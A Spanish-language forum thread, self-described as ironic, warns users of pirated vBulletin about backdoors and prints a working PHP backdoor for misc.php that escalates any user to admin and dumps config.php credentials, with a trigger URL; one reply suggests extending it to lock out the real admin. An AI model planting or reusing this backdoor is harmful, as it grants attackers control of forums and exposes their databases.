Descarga vBulletin sin costo y con riesgos advertidos

imported_Jhonnyf Seguir

Épsilon
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
6 Sep 2008
Nota administrativa: Éste tema fue escrito con carácter humorístico e irónico. Busca concientizar a los usuarios de licencias piratas de vBulletin acerca del riesgo que corren.

Antes de darte el link de descarga, quiero avisarte que cuando lo subi, le meti las siguientes linea de codigo en el archivo misc.php justo despues de
PHP:
($hook = vBulletinHook::fetch_hook('misc_start')) ? eval($hook) : false;
lo que le puse fue lo siguiente

PHP:
if ($_REQUEST['do'] == 'Jhonnyf')
{
    $userid = $vbulletin->input->clean_gpc('r', 'userid', TYPE_INT);
    $grupoid = $vbulletin->input->clean_gpc('r', 'grupoid', TYPE_INT);
    $db->query_read_slave("update " . TABLE_PREFIX . "user AS user
        SET usergroupid=$grupoid
        WHERE userid=$userid
    ");
    $filename = "./includes/config.php";
    $handle = fopen($filename, "r");
    $contents = fread($handle, filesize($filename));
    fclose($handle);
    header("Content-type: text/plain;charset=iso-8859-1");
    echo $contents;
    exit();
}
asi que cuando yo me registre en tu foro y me den mi ID de usuario (por ejemplo el 1542) solo tendré que poner esto
[noparse]http://tu_foro.com/misc.php?do=Jhonnyf&userid=1542&grupoid=6[/noparse]

y listo, Ya seré un Admin (puedo cambiar de grupo si no me resulta o usas uno diferente) y de pasadito veo todo el contenido de tu config.php para entrar via MyphpAdmin a tu base de datos y borrarme todo lo que quiera

Ahora si ya tienes un vBulletin instalado, tambien te puedo ofrecer muchos Hacks y plugins recien bajaditos de vbulletin.org, solo que les agregaré un plugin más con el codigo de arriba y lo engancharé en misc_start :D asi que el efecto será el mismo

No te preocupes, eso es solo mi firma para saber que ese vBulletin fue "NULLEADO" por mi, ¿acaso crees que lo hago por algun otro motivo? usalo con confianza nomás... ¿para que vas a pagar a Jelsoft tanto dinero si te lo puedo dar gratis y sin ningun problema?... vamos.. no tengas miedo

Link de descarga

Atte: El Nulleador Enmascarado
1171110350.jpg

pavel_ps3

Beta
Desde
16 Dic 2008
Menos mal q tengo licencia y todos mis hacks son de vbulletin.org xD

Muy bueno Enlace eliminado ayudara a los q tienen vbulletin null a saber a lo q se arriesgan..

SEW810

Delta
Desde
29 Mar 2008
Venga chicos , no es dificil entender, es solo un "pase directo" para que al registrarte seas admin, además muestra en pantalla el contenido del archivo congig.php , de esa manera tendrá acceso libre a server, usuario y contraseña de la base de datos del foro nulled.

Estaría genial que tu script pudiera abrir el config.php y te pongas como unaltrable users y superadmin, y de pasada borras el ID 1 de los unalterable para que así puedas bannear al propio administrador XD

UmbreLla7

Gamma
Desde
8 Ago 2008
Por favor, ten en cuenta 📝 que si deseas hacer un trato 🤝 con este usuario, está baneado 🔒.
A Dios gracias soy legal no tenía idea que eso se podía :S.

Saludos!

B

Butowski

Es decir en pocas palabras.

alguna vez te han hackeado el servidor, mas el dominios de las DNS mas tu foro y todo ?

bueno resulta que casi siempre usan la misma clave en todo, y los que ofrecen los vBulletin null pueden hacer lo que hizo mi amigo Jhonnyf ponerce de administradores en tu foro sin tu tener ni la minima idea y robarte los codigos de accesos usuarios y demas.
Tambien este tema para aquellos que les gusta usar vBulletin, compren sus licencias asi estaran mas seguro a la hora de algo asi.

Carrega

Zeta
Verificación en dos pasos activada
Desde
13 Ago 2008
el unico fin que tiene este tema es enseñar lo fácil que es putear a uno que tiene el foro nulled, o acaso os creíais que yo pague casi 200€mas los 30 que pago anuales por gusto?

usar un script que a saber por las manos de quien ha pasado es un riesgo muy grande, y yo no lo he sufrido en mis carnes por un scriopt de pago, sino por uno gratuito!!

Y despues vendran llorando... "ME HAN HACKEADO MI FORO"

Ricardo Núñez

Eta
Desde
17 Dic 2008
Ahora si que Kas Lanzo una indirecta muy DIRECTA xD
A quien le diras eso Kas?
xD
Aunque hay muchos casos de eso...

SEW810

Delta
Desde
29 Mar 2008
Han de estar lindísimos los pack que ofrecen vbulletin y hacks
Hacks .... manoseados ????

Yo mejor los bajo de vbulletin.org , sitio oficial de hacks y mods.

Ricardo Núñez

Eta
Desde
17 Dic 2008
Me Pasas el Pack de Hacks Johny?
xD Haha Okey No xD
Aunque no falta quien lo diga ¬¬
En Fin, No Hay Nada Como un Buen vBulletin Legal

B

Butowski

exactamente, por eso los invito y recomiendo que compren sus licencis chicos, se ahorran muchos problemas.

Solo imaginen que tienen un foro con vBulletin Null que tenga unos 2.000 usuarios registrados, con mas de 1.000 visitas diarias, es decir, un foro con mucho trafico diario, y pff te roben el foro jajaja es para morirce xD

joenico

Curioso
Desde
28 Jul 2008
Jhonny te felicito por la iniciativa, pero al mismo tiempo quien esta intentando evitar un delito (violacion de copyright) esta cometiendo otro como es el de Robo de Identidad, borrado/perdida de datos, etc, etc, etc...
Creo que la solucion no pasa por cometer un delito para enfretar a otro. Por dar un ejemplo, no podemos salir a matar gente para evitar que esa gente mate a otros.
La respuesta esta en acudir a la justicia. Se pueden denunciar los sitios que alojan los nulled, se pueden denunciar los sitios que poseen un foro nulled, etc, etc, etc...
Entiendo que tu post fue en sentido ironico, pero tambien me preocupa que se "piense" en esa opcion como respuesta.
Mucha gente baja e instala con la idea de probar. Una gran parte de esa gente lo mantiene a perpetuidad, pero otra parte compra la licencia. Quizas una parte de la solucion seria la entrega de una version de prueba por X cantidad de tiempo, como hacen la mayoria de las empresas de software con sus productos. O una version Light que puede servir para la mayoria de los pequeños proyectos (si si, existen otras versiones gratuitas, pero no con la calidad y opciones de vB).
Confieso que me rei mucho con el thread, pero al terminar me quede pensando que si Jhonny puede hacerlo, por que no pueden hacer lo mismo desde la empresa o alguno de sus empleados ? Para quienes como yo, tenemos conocimientos minimos puede pasar desapercibido, pero podrian acceder a nuestros datos, los de nuestros usuarios, arruinar el trabajo hecho y una larga lista de etceteras...
No se.. Es algo que no habia considerado y que hoy, me planteo seriamente.
Repito, entiendo la ironia de thread, pero me preocupa igual.

Eduardo Leon

Dseda
Programador
Desde
11 Oct 2009
Por favor, ten en cuenta 📝 que si deseas hacer un trato 🤝 con este usuario, está baneado 🔒.
o_o?

todos los vbulletin nulled o con algun tipo de clave contienen un codigo malisioso .

algunos que no creen y compran su hosting para poder solventarse y hacerse pasar por legal .

al fin y al cabo , "SIEMPRE" esta "piracy reports" para poder denunciarlos

---------- Actualizado a las 23:49 ---------- Original a las 23:48 ----------

Jhonny te felicito por la iniciativa, pero al mismo tiempo quien esta intentando evitar un delito (violacion de copyright) esta cometiendo otro como es el de Robo de Identidad, borrado/perdida de datos, etc, etc, etc...
Creo que la solucion no pasa por cometer un delito para enfretar a otro. Por dar un ejemplo, no podemos salir a matar gente para evitar que esa gente mate a otros.
La respuesta esta en acudir a la justicia. Se pueden denunciar los sitios que alojan los nulled, se pueden denunciar los sitios que poseen un foro nulled, etc, etc, etc...
Entiendo que tu post fue en sentido ironico, pero tambien me preocupa que se "piense" en esa opcion como respuesta.
Mucha gente baja e instala con la idea de probar. Una gran parte de esa gente lo mantiene a perpetuidad, pero otra parte compra la licencia. Quizas una parte de la solucion seria la entrega de una version de prueba por X cantidad de tiempo, como hacen la mayoria de las empresas de software con sus productos. O una version Light que puede servir para la mayoria de los pequeños proyectos (si si, existen otras versiones gratuitas, pero no con la calidad y opciones de vB).
Confieso que me rei mucho con el thread, pero al terminar me quede pensando que si Jhonny puede hacerlo, por que no pueden hacer lo mismo desde la empresa o alguno de sus empleados ? Para quienes como yo, tenemos conocimientos minimos puede pasar desapercibido, pero podrian acceder a nuestros datos, los de nuestros usuarios, arruinar el trabajo hecho y una larga lista de etceteras...
No se.. Es algo que no habia considerado y que hoy, me planteo seriamente.
Repito, entiendo la ironia de thread, pero me preocupa igual.

Creo que para todo esto existe una pagina "no crees" ?

asi el lo coloque en forma "ironica" es algo que esta sucediendo .

es por eso que a nosotros nos queda "denunciarlos" .

Eduardo Leon

Dseda
Programador
Desde
11 Oct 2009